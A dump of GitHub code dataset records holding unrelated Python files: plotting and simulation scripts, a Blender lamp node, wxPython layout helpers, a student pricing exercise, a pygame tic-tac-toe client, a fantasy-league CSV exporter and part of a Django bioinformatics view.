1\r\n\r\nfdistribution = stats.f(p - 1, n - p) \r\n# build an F-distribution object\r\nf_critical = fdistribution.ppf(1 - alpha)\r\n\r\np_value = 1 - stats.f.cdf(F, p - 1, n - p)\r\n\r\n#%% visualization\r\nx_points = x_df.values.T\r\ny_points = y_df.values.T\r\ny_hat_points = y_hat.values.T\r\n\r\np = model.fit().params\r\n\r\n# generate x-values for regression line\r\nx = np.linspace(x_df.min(),x_df.max(),10)\r\n\r\nfig, ax = plt.subplots()\r\nplt.plot(x_points,y_points,'.'); \r\nplt.plot(x_points,y_hat_points,'+k'); \r\n\r\nplt.plot(x, p.const + p.SP500 * x,color = 'r')\r\nplt.plot(np.vstack((x_points,x_points)),\r\n np.vstack((y_points,y_hat_points)),\r\n color = [0.7,0.7,0.7]);\r\n\r\nplt.axis('scaled')\r\nplt.ylabel('y')\r\nplt.xlabel('x')\r\nplt.xlim([-0.15,0.15])\r\nplt.ylim([-0.15,0.15])\r\n","repo_name":"Visualize-ML/Book6_First-Course-in-Data-Science","sub_path":"Book6_Ch09_Python_Codes/Bk6_Ch09_02.py","file_name":"Bk6_Ch09_02.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","stars":1194,"dataset":"github-code","pt":"54"} +{"seq_id":"31967566031","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom math import pi, sin, cos, sqrt, exp\nfrom scipy.fftpack import dst\n\nL = 101\nphi = 7.0\nalpha = 50\nc = 1\n\nf = lambda x: np.exp(-np.power(x-alpha,2)/(2*np.power(phi, 2))) / np.sqrt(2*pi*np.power(phi, 2))\n\nA = np.fromfunction(f, (L,))\nA[0] = A[-1] = 0\n\ndef fn(t, F):\n\txs = np.arange(0, L, 1)\n\tfF = dst(F)\n\tfor x in xs:\n\t\txs[x] = 0\n\t\tfor n in range(0, F.shape[0]):\n\t\t\txs[x] += fF[x] * cos(c*pi*n*t) * sin(pi*n*x/L)\n\treturn xs\n\nfig, ax = plt.subplots(2)\nax[0].plot(A)\nax[1].plot(fn(0, A))\nplt.show()\nexit()\n\nfig, ax = plt.subplots()\nplt.ion()\nplt.show()\n\nfor i in range(0,100):\n\tax.plot(fn(i/10.0, A))\n\tax.set_ylim(-10, 10)\n\tplt.draw()\n\tplt.pause(1)\n\tplt.cla()\n\tprint(i)\n","repo_name":"sondrehav/master","sub_path":"EchoSimPython/analytic.py","file_name":"analytic.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37778237720","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\nfrom math import radians\nimport bpy\nfrom mathutils import Matrix\nfrom bpy.props import StringProperty, BoolProperty, EnumProperty, FloatProperty, IntProperty, FloatVectorProperty\nfrom sverchok.data_structure import node_id, Matrix_generate, updateNode, match_long_repeat, get_data_nesting_level, ensure_nesting_level\nfrom sverchok.node_tree import SverchCustomTreeNode\n\n\nclass SvLampOutNode(SverchCustomTreeNode, bpy.types.Node):\n \"\"\"\n Triggers: Lamp\n Tooltip: Generate Lamp objects\n \"\"\"\n\n bl_idname = \"SvLampOutNode\"\n bl_label = \"Lamp\"\n bl_icon = 'LIGHT' #\"OUTLINER_OB_LAMP\"\n\n replacement_nodes = [('SvLightViewerNode', None, None)]\n\n activate: BoolProperty(\n name=\"Activate\", default=True,\n description='When enabled this will process incoming data',\n update=updateNode)\n\n lamp_name: StringProperty(\n default='Lamp_Alpha',\n description=\"sets which base name the object will use\",\n update=updateNode)\n\n lamp_types = [\n (\"POINT\", \"Point\", \"Omnidirectional point light source\", \"LAMP_POINT\", 0),\n (\"SUN\", \"Sun\", \"Constant direction parallel light source\", \"LAMP_SUN\", 1),\n (\"SPOT\", \"Spot\", \"Directional cone light source\", \"LAMP_SPOT\", 2),\n (\"HEMI\", \"Hemi\", \"180 degrees constant light source (not supported in Cycles)\", \"LAMP_HEMI\", 3),\n (\"AREA\", \"Area\", \"Directional area light source\", \"LAMP_AREA\", 4)\n ]\n \n def update_type(self, context):\n is_spot = (self.type == 'SPOT')\n self.inputs['Spot Size'].hide_safe = not is_spot\n self.inputs['Spot Blend'].hide_safe = not is_spot\n updateNode(self, context)\n\n type: EnumProperty(\n name=\"Type\", description=\"Light source type\",\n items=lamp_types, default=\"POINT\", update=update_type)\n\n area_types = [\n (\"RECTANGLE\", \"Rectangle\", \"Rectangular area\", 0),\n (\"SQUARE\", \"Square\", \"Square area\", 1)\n ]\n\n def update_area_type(self, context):\n square = (self.type != 'AREA' or self.area_type == 'SQUARE')\n self.inputs['Size'].hide_safe = not square\n self.inputs['Size X'].hide_safe = square\n self.inputs['Size Y'].hide_safe = square\n updateNode(self, context)\n\n area_type: EnumProperty(\n name=\"Area type\", description=\"Area shape type\", default=\"RECTANGLE\",\n items=area_types, update=update_area_type)\n\n size: FloatProperty(\n name=\"Size\", description=\"Light source size\", default=0.1, update=updateNode)\n\n size_x: FloatProperty(\n name=\"Size X\", description=\"Light source size\", default=0.1, update=updateNode)\n \n size_y: FloatProperty(\n name=\"Size Y\", description=\"Light source size\", default=0.1, update=updateNode)\n\n spot_size: FloatProperty(\n name=\"Spot Size\", description=\"Angle of the spotlight beam (degrees)\",\n default=45.0, min=0.0, max=180.0, update=updateNode)\n\n spot_blend: FloatProperty(\n name=\"Spot Blend\", description=\"The softness of the spotlight edge\",\n default=0.15, min=0.0, max=1.0, update=updateNode)\n\n strength: FloatProperty(\n name=\"Strength\", description=\"Lamp power\",\n default=100.0, min=0.0, max=1000000, update=updateNode)\n\n show_cone: BoolProperty(\n name=\"Show cone\", description=\"Draw transparent cone in the 3D View\",\n default=False, update=updateNode)\n\n max_bounces: IntProperty(\n name=\"Max Bounces\", description=\"Maximum number of bounces the lamp will contribute to the render\",\n min=1, max=1000000, default=1024, update=updateNode)\n\n cast_shadow: BoolProperty(\n name=\"Cast shadow\", description=\"Lamp casts shadows\",\n default=True, update=updateNode)\n\n multiple_imporance: BoolProperty(\n name=\"Multiple importance\", description=\"Use multiple importance sampling for the lamp\",\n default=True, update=updateNode)\n\n use_nodes: BoolProperty(\n name=\"Use Nodes\", description=\"Use node tree instead of directly specified color\",\n default=True, update=updateNode)\n\n light_color: FloatVectorProperty(\n name=\"Color\", description=\"Light color\", update=updateNode,\n default=(1.0, 1.0, 1.0, 1.0), size=4, min=0.0, max=1.0, subtype='COLOR')\n\n emission_node_name: StringProperty(\n name=\"Emission Node\", description=\"Name of Emission node in the lamp shader, that contains Sthrength and Color inputs\",\n default=\"Emission\", update=updateNode)\n\n def sv_init(self, context):\n self.inputs.new('SvMatrixSocket', 'Origin')\n self.inputs.new('SvStringsSocket', 'Size').prop_name = 'size'\n\n i = self.inputs.new('SvStringsSocket', 'Size X')\n i.prop_name = 'size_x'\n i.hide_safe = True\n\n i = self.inputs.new('SvStringsSocket', 'Size Y')\n i.prop_name = 'size_y'\n i.hide_safe = True\n\n i = self.inputs.new('SvStringsSocket', 'Spot Size')\n i.prop_name = 'spot_size'\n i.hide_safe = True\n\n i = self.inputs.new('SvStringsSocket', 'Spot Blend')\n i.prop_name = 'spot_blend'\n i.hide_safe = True\n\n i = self.inputs.new('SvStringsSocket', 'Strength')\n i.prop_name = 'strength'\n\n color_socket = self.inputs.new('SvColorSocket', \"Color\")\n color_socket.prop_name = 'light_color'\n\n self.outputs.new('SvObjectSocket', 'Objects')\n\n def draw_buttons(self, context, layout):\n view_icon = 'LIGHT' if self.activate else 'ERROR'\n layout.prop(self, \"activate\", text=\"UPD\", toggle=True, icon=view_icon)\n layout.prop(self, 'lamp_name')\n layout.prop(self, 'type')\n if self.type == 'AREA':\n layout.prop(self, 'area_type')\n\n def draw_buttons_ext(self, context, layout):\n self.draw_buttons(context, layout)\n layout.prop(self, 'use_nodes')\n layout.prop(self, 'max_bounces')\n layout.prop(self, 'cast_shadow')\n layout.prop(self, 'multiple_imporance')\n if self.type == 'SPOT':\n layout.prop(self, 'show_cone')\n layout.prop(self, 'emission_node_name')\n\n def get_children(self):\n objects = bpy.data.objects\n objs = [obj for obj in objects if obj.type == 'LIGHT']\n # criteria, basename must be in object.keys and the value must be self.basemesh_name\n return [o for o in objs if o.get('basename') == self.lamp_name]\n\n def make_lamp(self, index, object):\n origin, size, size_x, size_y, strength, spot_size, spot_blend, color = object\n\n if get_data_nesting_level(color) == 2:\n color = color[0]\n if isinstance(size, (list, tuple)):\n size = size[0]\n if isinstance(size_x, (list, tuple)):\n size_x = size_x[0]\n if isinstance(size_y, (list, tuple)):\n size_y = size_y[0]\n if isinstance(strength, (list, tuple)):\n strength = strength[0]\n if isinstance(spot_size, (list, tuple)):\n spot_size = spot_size[0]\n if isinstance(spot_blend, (list, tuple)):\n spot_blend = spot_blend[0]\n\n scene = bpy.context.scene\n\n # ensure we use a collection\n collections = bpy.data.collections\n collection = collections.get(self.lamp_name)\n if not collection:\n collection = collections.new(self.lamp_name)\n bpy.context.scene.collection.children.link(collection)\n\n lamps_data = bpy.data.lights\n objects = bpy.data.objects\n name = self.lamp_name + \"_\" + str(index)\n\n if name in objects:\n lamp_object = objects[name]\n if lamp_object.data.type != self.type:\n lamp_object.data.type = self.type\n else:\n lamp_data = lamps_data.new(name = name, type = self.type)\n lamp_object = objects.new(name = name, object_data = lamp_data)\n collection.objects.link(lamp_object)\n\n lamp_object['idx'] = index\n lamp_object['madeby'] = self.name\n lamp_object['basename'] = self.lamp_name\n \n lamp_object.matrix_local = origin\n\n lamp = lamp_object.data\n\n lamp.type = self.type\n lamp.color = color[:3]\n if self.type in ('POINT', 'SUN', 'SPOT'):\n lamp.shadow_soft_size = size\n elif self.type == 'AREA' and self.area_type == 'SQUARE':\n lamp.shape = 'SQUARE'\n lamp.size = size\n elif self.type == 'AREA' and self.area_type == 'RECTANGLE':\n lamp.shape = 'RECTANGLE'\n lamp.size = size_x\n lamp.size_y = size_y\n \n if self.type == 'SPOT':\n lamp.spot_size = radians(spot_size)\n lamp.spot_blend = spot_blend\n lamp.show_cone = self.show_cone\n\n if lamp.cycles:\n lamp.cycles.max_bounces = self.max_bounces\n lamp.cycles.cast_shadow = self.cast_shadow\n lamp.cycles.use_multiple_importance_sampling = self.multiple_imporance\n lamp.use_nodes = True\n\n if self.emission_node_name and self.emission_node_name in lamp.node_tree.nodes:\n node = lamp.node_tree.nodes[self.emission_node_name]\n node.inputs['Strength'].default_value = strength\n if len(color) != 4:\n raise Exception(\"Color data must contain 4 floats (RGBA), not {}\".format(len(color)))\n node.inputs['Color'].default_value = color\n\n def process(self):\n\n if not self.activate:\n return\n\n origins = self.inputs['Origin'].sv_get()\n sizes_sq = self.inputs['Size'].sv_get()\n sizes_x = self.inputs['Size X'].sv_get()\n sizes_y = self.inputs['Size Y'].sv_get()\n spot_sizes = self.inputs['Spot Size'].sv_get()\n spot_blends = self.inputs['Spot Blend'].sv_get()\n strengths = self.inputs['Strength'].sv_get()\n colors = self.inputs['Color'].sv_get()\n # next is not needed\n # if get_data_nesting_level(colors) == 3:\n # colors = colors[0]\n\n objects = match_long_repeat([origins, sizes_sq, sizes_x, sizes_y, strengths, spot_sizes, spot_blends, colors])\n\n for index, object in enumerate(zip(*objects)):\n self.make_lamp(index, object)\n\n self.remove_non_updated_objects(index)\n\n objs = self.get_children()\n self.outputs['Objects'].sv_set(objs)\n\n def remove_non_updated_objects(self, obj_index):\n objs = self.get_children()\n objs = [obj.name for obj in objs if obj['idx'] > obj_index]\n if not objs:\n return\n\n lamps_data = bpy.data.lights\n objects = bpy.data.objects\n collection = bpy.data.collections.get(self.lamp_name)\n\n # remove excess objects\n for object_name in objs:\n obj = objects[object_name]\n obj.hide_select = False\n collection.objects.unlink(obj)\n objects.remove(obj, do_unlink=True)\n\n # delete associated lamps data\n for object_name in objs:\n lamps_data.remove(lamps_data[object_name])\n\n def load_from_json(self, node_data: dict, import_version: float):\n if import_version <= 0.08:\n self.type = node_data.get(\"lamp_type\", \"POINT\")\n\n\ndef register():\n bpy.utils.register_class(SvLampOutNode)\n\ndef unregister():\n bpy.utils.unregister_class(SvLampOutNode)\n","repo_name":"nortikin/sverchok","sub_path":"old_nodes/lamp_out.py","file_name":"lamp_out.py","file_ext":"py","file_size_in_byte":12119,"program_lang":"python","lang":"en","doc_type":"code","stars":2098,"dataset":"github-code","pt":"54"} +{"seq_id":"32616983138","text":"import wx\nfrom .text import SimpleText\nfrom .utils import pack, LEFT\n\nclass RowPanel(wx.Panel):\n \"\"\" a simple row panel with horizontal sizer\"\"\"\n def __init__(self, parent, **kws):\n wx.Panel.__init__(self, parent, **kws)\n self.sizer = wx.BoxSizer(wx.HORIZONTAL)\n\n def Add(self, item, expand=0, style=LEFT, padding=2):\n self.sizer.Add(item, expand, style, padding)\n\n def AddText(self, label, expand=0, style=LEFT,\n padding=2, **kws):\n self.sizer.Add(SimpleText(self, label, **kws),\n expand, style, padding)\n def pack(self):\n pack(self, self.sizer)\n\n\nclass GridPanel(wx.Panel):\n \"\"\"A simple panel with a GridBagSizer\"\"\"\n\n def __init__(self, parent, nrows=10, ncols=10, pad=2, gap=5,\n itemstyle=wx.ALIGN_CENTER, **kws):\n\n wx.Panel.__init__(self, parent, **kws)\n self.sizer = wx.GridBagSizer(nrows, ncols)\n self.sizer.SetVGap(gap)\n self.sizer.SetHGap(gap)\n\n self.irow = 0\n self.icol = 0\n self.itemstyle = itemstyle\n self.pad=pad\n\n def Add(self, item, irow=None, icol=None, drow=1, dcol=1, style=None,\n newrow=False, pad=None, **kws):\n \"\"\"add item with default values for col, row, and size\"\"\"\n if newrow:\n self.NewRow()\n if style is None:\n style = self.itemstyle\n if irow is None:\n irow = self.irow\n if pad is None:\n pad = self.pad\n if icol is None:\n icol = self.icol\n self.sizer.Add(item, (irow, icol), (drow, dcol), style, pad, **kws)\n self.icol = self.icol + dcol\n\n def AddMany(self, items, newrow=False, **kws):\n \"\"\"add items\"\"\"\n if newrow: self.NewRow()\n for item in items:\n self.Add(item, **kws)\n\n def AddManyText(self, items, newrow=False, **kws):\n \"\"\"add items\"\"\"\n if newrow: self.NewRow()\n for item in items:\n self.AddText(item, **kws)\n\n def NewRow(self):\n \"advance row, set col # = 0\"\n self.irow += 1\n self.icol = 0\n\n def AddText(self, label, newrow=False, dcol=1, style=None, **kws):\n \"\"\"add a Simple StaticText item\"\"\"\n if style is None:\n style = LEFT\n self.Add(SimpleText(self, label, style=style, **kws),\n dcol=dcol, style=style, newrow=newrow)\n\n def pack(self):\n tsize = self.GetSize()\n msize = self.GetMinSize()\n\n self.SetSizer(self.sizer)\n self.sizer.Fit(self)\n nsize = (10*int(1.1*(max(msize[0], tsize[0])/10)),\n 10*int(1.1*(max(msize[1], tsize[1])/10.)))\n self.SetSize(nsize)\n","repo_name":"newville/wxutils","sub_path":"wxutils/gridpanel.py","file_name":"gridpanel.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"5977875351","text":"'''\np1 : nama=>Budi, produk=> TV, jumlah=>3\n\np2 : nama=>Ani, produk=> AC, jumlah=>4\n\np3 : nama=>Siti, produk=> Kulkas, jumlah=>2\n\np4 : nama=>Dewi, produk=> AC, jumlah=>5\n\np5 : nama=>Andi, produk=> Kulkas, jumlah=>7\n\np6 : nama=>Dedi, produk=> AC, jumlah=>1\n\np7 : nama=>Sri, produk=> TV, jumlah=>4\n\nSemua pelanggan masukkan ke sebuah list dengan nama ar_pelanggan (Bobot Penilaian 5 Point)\n\nCetaklah Data Pembelian Pelanggan Menggunakan Nested Loop Dengan Data:\n\n- Nama Pelanggan(Bobot Penilaian 5 Point)\n\n- Produk Beli (Bobot Penilaian 5 Point)\n\n- Jumlah Beli (Bobot Penilaian 10 Point)\n\n- Harga Satuan: (Bobot Penilaian 20 Point)\n\n Gunakan kondisional if:\n\n (TV=>5 jt, AC=>6 jt, Kulkas=>7 jt)\n\n- Harga Kotor => Jumlah Beli x Harga Satuan (Bobot Penilaian 10 Point)\n\n- Diskon: (Bobot Penilaian 10 Point)\n\n Gunakan Tuple & List \n\n Jika Beli Produk Kulkas minimal 3 pcs dapat diskon 20% dari harga kotor,\n\n Selain itu diskon hanya 5% dari harga kotor\n\n- PPN => 11% x (Harga Kotor - Diskon) (Bobot Penilaian 10 Point)\n\n- Harga Bayar => (Harga Kotor + PPN) - Diskon (Bobot Penilaian 5 Point)\n'''\n\np1 = {\n \"nama\": \"Budi\",\n \"produk\": \"TV\",\n \"jumlah\": 3\n}\np2 = {\n \"nama\": \"Ani\",\n \"produk\": \"AC\",\n \"jumlah\": 4\n}\np3 = {\n \"nama\": \"Siti\",\n \"produk\": \"Kulkas\",\n \"jumlah\": 2\n}\np4 = {\n \"nama\": \"Dewi\",\n \"produk\": \"AC\",\n \"jumlah\": 5\n}\np5 = {\n \"nama\": \"Andi\",\n \"produk\": \"Kulkas\",\n \"jumlah\": 7\n}\np6 = {\n \"nama\": \"Dedi\",\n \"produk\": \"AC\",\n \"jumlah\": 1\n}\np7 = {\n \"nama\": \"Sri\",\n \"produk\": \"TV\",\n \"jumlah\": 4\n}\n\nar_pelanggan = [p1, p2, p3, p4, p5, p6, p7]\n\nfor pelanggan in ar_pelanggan:\n print(f\"nama: {pelanggan['nama']}\")\n print(f\"produk: {pelanggan['produk']}\")\n print(f\"jumlah: {pelanggan['jumlah']}\")\n\n if (pelanggan[\"produk\"] == \"TV\"):\n hargaSatuan = 5000000\n elif (pelanggan[\"produk\"] == \"AC\"):\n hargaSatuan = 6000000\n elif (pelanggan[\"produk\"] == \"Kulkas\"):\n hargaSatuan = 7000000 \n\n print(\"Harga Satuan : \", hargaSatuan)\n \n\n hargaKotor = pelanggan[\"jumlah\"] * hargaSatuan\n print(\"Harga Kotor : \", hargaKotor)\n\n diskon = (hargaKotor * 0.05, hargaKotor * 0.2)[pelanggan[\"produk\"] == \"Kulkas\" and pelanggan[\"jumlah\"] >= 3]\n print(\"Diskon : \",diskon)\n\n ppn = 0.11 * (hargaKotor - diskon)\n print(\"PPN : \",ppn)\n\n harga_bayar = (hargaKotor + ppn) - diskon\n print(\"Harga Bayar : \",harga_bayar)\n\n print(\"==============================\")","repo_name":"aldiramdhan/python-sem-1","sub_path":"Tugas/tugas1_ddp_rabu_Muhamad Aldi Ramdani_0110122170_SI08.py","file_name":"tugas1_ddp_rabu_Muhamad Aldi Ramdani_0110122170_SI08.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70877263202","text":"from django.urls import path\nfrom .views import *\n\nurlpatterns = [\n path('', index, name='index'),\n path('about', about, name='about'),\n path('urgent_repairs', urgent_repairs, name='urgent_repairs'),\n path('d_dev', d_dev, name='d_dev'),\n path('exchange_fund', exchange_fund, name='exchange_fund'),\n path('restoration', restoration, name='restoration'),\n path('', show_category),\n]\n","repo_name":"SitnikSasha/Test_Site","sub_path":"JeweleryJew/main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18498830112","text":"import time\nfrom pickle import dumps, loads\n\nimport pygame\n\nfrom game import Game\nfrom network import Network\nfrom player import Player\n\npygame.init()\npygame.font.init()\n\nBIG_FONT = pygame.font.SysFont(\"comicsans\", 50)\nSMALL_FONT = pygame.font.SysFont(\"comicsans\", 30)\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nBLUE = (0, 0, 255)\nGREEN = (0, 255, 0)\n\nWIDTH, TOTAL_HEIGHT = 600, 665\nHEIGHT = 600 # This is going to be the game board height, same as width. \n # The additionial height is for players' information.\nDIFF = TOTAL_HEIGHT - HEIGHT\nwindow = pygame.display.set_mode((WIDTH, TOTAL_HEIGHT))\npygame.display.set_caption(\"Tic Tac Toe\")\n\n\ndef redraw(win, game, p):\n win.fill(WHITE)\n if not game.connected():\n waiting_label = BIG_FONT.render(\n \"Waiting for opponent...\", 1, BLACK, True)\n win.blit(waiting_label, (win.get_width() // 2 - waiting_label.get_width() //\n 2, win.get_height() // 2 - waiting_label.get_height() // 2))\n else:\n game.board.draw(win)\n shape_label = SMALL_FONT.render(\n f\"Your Shape: {p.get_shape()}\", 1, BLACK)\n win.blit(shape_label, (5, HEIGHT + DIFF // 2 - 10))\n\n wins_label = SMALL_FONT.render(f\"Total Wins: {game.get_wins(p.get_id())}\", 1, BLACK)\n win.blit(wins_label, (win.get_width() -\n wins_label.get_width() - 5, HEIGHT + DIFF // 2 - 10))\n\n winner = game.get_winner()\n if winner != None: # The game ended\n pygame.draw.line(\n win, BLACK, game.get_winner_line_start(), game.get_winner_line_end(), 4)\n if winner.get_id() == p.get_id(): # We won\n winner_label = BIG_FONT.render(\"You Won :)\", 1, GREEN)\n win.blit(winner_label, (win.get_width() // 2 -\n winner_label.get_width() // 2, HEIGHT // 2))\n\n setting_label = winner_label = BIG_FONT.render(\n \"Setting up a new game.\", 1, GREEN)\n win.blit(setting_label, (win.get_width() // 2 -\n setting_label.get_width() // 2, HEIGHT // 2 + winner_label.get_height() + 5))\n else: # we lost\n loser_label = BIG_FONT.render(\"You Lost :(\", 1, RED)\n win.blit(loser_label, (win.get_width() // 2 -\n loser_label.get_width() // 2, HEIGHT // 2))\n setting_label = BIG_FONT.render(\n \"Setting up a new game.\", 1, RED)\n win.blit(setting_label, (win.get_width() // 2 -\n setting_label.get_width() // 2, HEIGHT // 2 + loser_label.get_height() + 5))\n elif game.is_draw():\n draw_label = BIG_FONT.render(\"Draw!\", 1, BLUE)\n win.blit(draw_label, (win.get_width() // 2 -\n draw_label.get_width() // 2, HEIGHT // 2))\n setting_label = BIG_FONT.render(\n \"Setting up a new game.\", 1, BLUE)\n win.blit(setting_label, (win.get_width() // 2 -\n setting_label.get_width() // 2, HEIGHT // 2 + draw_label.get_height() + 5))\n else: # game is stil going\n your_turn_label = SMALL_FONT.render(\"Your Turn\", 1, BLACK)\n his_turn_label = SMALL_FONT.render(\"His Turn\", 1, BLACK)\n if game.get_current_turn() == p.get_id():\n win.blit(your_turn_label, (win.get_width() // 2 -\n your_turn_label.get_width() // 2, HEIGHT + DIFF // 2 - 10))\n else:\n win.blit(his_turn_label, (win.get_width() // 2 -\n his_turn_label.get_width() // 2, HEIGHT + DIFF // 2 - 10))\n pygame.display.update()\n\n\ndef main():\n run = True\n FPS = 60\n BOARD_SIZE = 3\n clock = pygame.time.Clock()\n\n try:\n con = Network(\"192.168.1.33\", 6654)\n player = con.connect()\n except:\n print(\"[CLIENT] Failed creating connection. Quiting...\")\n quit()\n\n while run:\n clock.tick(FPS)\n try:\n game = con.send(\"get\")\n except:\n run = False\n break\n\n if (game == \"Q\"): # The other player exited the game\n window.fill(WHITE)\n quit_label = BIG_FONT.render(\n \"The other player has quit!\", 1, BLACK)\n window.blit(quit_label, (window.get_width() // 2 -\n quit_label.get_width() // 2, window.get_height() // 2))\n directing_label = BIG_FONT.render(\n \"Directing you to the main menu.\", 1, BLACK)\n window.blit(directing_label, (window.get_width() // 2 -\n directing_label.get_width() // 2,\n window.get_height() // 2 + quit_label.get_height() + 5))\n pygame.display.update()\n pygame.time.delay(3000)\n con.close()\n run = False\n break\n\n redraw(window, game, player)\n if game.done:\n try:\n pygame.time.delay(3000)\n con.send(\"reset\")\n except:\n break\n else:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n quit()\n if event.type == pygame.MOUSEBUTTONUP and game.connected() and \\\n game.get_current_turn() == player.get_id() and game.get_winner() == None:\n x, y = pygame.mouse.get_pos()\n if y < HEIGHT:\n j = (x // (WIDTH // BOARD_SIZE))\n i = (y // (WIDTH // BOARD_SIZE))\n if game.board.is_available(i, j):\n con.send(str(i) + \",\" + str(j))\n\n\ndef menu_screen():\n run = True\n clock = pygame.time.Clock()\n while run:\n clock.tick(60)\n window.fill(WHITE)\n start_label = BIG_FONT.render(\"Press anywhere to begin...\", 1, BLACK)\n window.blit(start_label, (window.get_width() // 2 -\n start_label.get_width() // 2, window.get_height() // 2 - 15))\n pygame.display.update()\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n quit()\n run = False\n if event.type == pygame.MOUSEBUTTONUP:\n run = False\n main()\n\n\nwhile True:\n menu_screen()\n","repo_name":"Amit12321/Online-TicTacToe","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":6613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72358973603","text":"\"\"\"Transform player data into CSV.\"\"\"\n\nimport csv\nimport os\n\nfrom loguru import logger\n\nfrom league_history_collector.collectors.models import League\n\n\ndef set_players(\n file_name: str, league: League, deduplicate: bool\n): # pylint: disable=too-many-locals,too-many-nested-blocks,too-many-branches\n \"\"\"Sets the players in the provided CSV. If the CSV already exists, players are loaded from file\n to help reduce duplicates.\n\n If deduplicate is true, if a (player name, position) combination is found in the CSV with only\n one id associated, then the id assigned in the League structure is ignored and the one from the\n file is used. If the CSV is assumed to contain the player ids on the most recent platform, then\n older league data would be migrated to use the newer player ids. If (player name, position) is\n found multiple times (i.e. 2+ people with the same name play the same position), then we give up\n and continue using the id from the League object because we can't be sure which id is correct.\n\n :param file_name: Name of the CSV to write data to, and if, already existing, load data from.\n :type file_name: str\n :param league: League data.\n :type league: League\n :param deduplicate: If True, deduplicates players.\n :type deduplicate: bool\n \"\"\"\n\n players_output = {}\n if os.path.isfile(file_name):\n logger.info(f\"{file_name} exists, loading existing players\")\n with open(file_name, encoding=\"utf-8\") as infile:\n csv_reader = csv.DictReader(infile)\n for row in csv_reader:\n player_tuple = (row[\"player_name\"], row[\"player_position\"])\n if player_tuple not in players_output:\n players_output[player_tuple] = set()\n\n players_output[player_tuple].add(row[\"player_id\"])\n\n for _, season in league.seasons.items():\n for _, week in season.weeks.items():\n for game in week.games:\n for team_data in game.team_data:\n for player in team_data.roster.starters:\n player_tup = (player.name, player.position)\n potential_ids = players_output.get(player_tup, {player.id})\n if not deduplicate or len(potential_ids) != 1:\n potential_ids.add(player.id)\n players_output[player_tup] = potential_ids\n\n for player in team_data.roster.bench:\n player_tup = (player.name, player.position)\n potential_ids = players_output.get(player_tup, {player.id})\n if not deduplicate or len(potential_ids) != 1:\n potential_ids.add(player.id)\n players_output[player_tup] = potential_ids\n\n logger.info(f\"Writing players to {file_name}\")\n with open(file_name, \"w\", encoding=\"utf-8\") as outfile:\n fieldnames = [\"player_id\", \"player_name\", \"player_position\"]\n writer = csv.DictWriter(outfile, fieldnames=fieldnames)\n\n writer.writeheader()\n for (p_name, p_pos), p_ids in players_output.items():\n for p_id in p_ids:\n writer.writerow(\n {\"player_id\": p_id, \"player_name\": p_name, \"player_position\": p_pos}\n )\n","repo_name":"lynshi/league-history-collector","sub_path":"league_history_collector/transformer/csv/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7485278786","text":"from ...helpers.common import *\nfrom django.contrib.staticfiles.templatetags.staticfiles import static\nfrom django.core.files.storage import default_storage\nfrom django.contrib.staticfiles import finders\n\ndef get_card(request, symbol=None, database=None):\n \"\"\"\n Returns a card with information about a human gene, a planarian gene or a \n planarian contig.\n \n Accepts:\n * **GET**\n * **GET + AJAX**\n\n Args:\n symbol (`str`): Identifier of entity for which to generate card.\n database (`str`): Database of symbol.\n\n Response:\n * **GET**:\n * **node** (:obj:`Smesgene` or :obj:`Human` or :obj:`PlanarianContig`): Instance of card element.\n * **transcripts** (`list` of :obj:`PlanarianContig`): List of contigs associated with gene (only for :obj:`PlanarianGene`) \n * **best_transcript** (:obj:`PlanarianContig`): Best planarian contig for gene (only for :obj:`PlanarianGene`)\n * **json_graph** (str): Interaction graph of predicted interactions in JSON format (only for :obj:`PlanarianGene` or :obj:`PlanarianContig`). \n * **homologs** (`list` of `tuple`): Homologous :obj:`PlanarianContig` s for Human gene. First element is Database name, second is :obj:`PlanarianContig` object (only for :obj:`Human`).\n * **domains** (str): PFAM domains in JSON format (only for :obj:`PlanarianContig`).\n\n * **GET + AJAX**:\n * **HttpResponse**: Response with a file.\n \n Example:\n\n .. code-block:: bash\n\n curl -H \"X-REQUESTED-WITH: XMLHttpRequest\" \\\\\n -H \"Content-Type: application/json\" \\\\\n -X GET \\\\\n \"https://compgen.bio.ub.edu/PlanNET/info_card?target=SMESG000005930.1&targetDB=Smesgene\"\n \n \"\"\"\n if request.method == 'GET' and request.is_ajax():\n symbol = request.GET['target']\n database = request.GET['targetDB']\n template = \"\"\n try:\n \n if database == \"Human\":\n template = \"NetExplorer/human_card.html\"\n card_node = HumanNode(symbol, database)\n homologs = card_node.get_homologs()\n card_node.get_summary()\n all_databases = Dataset.get_allowed_datasets(request.user)\n sorted_homologs = list()\n for db in all_databases:\n if db.name in homologs:\n sorted_homologs.append((db.name, homologs[db.name]))\n else:\n sorted_homologs.append((db.name, list()))\n elif database == \"Smesgene\":\n template = 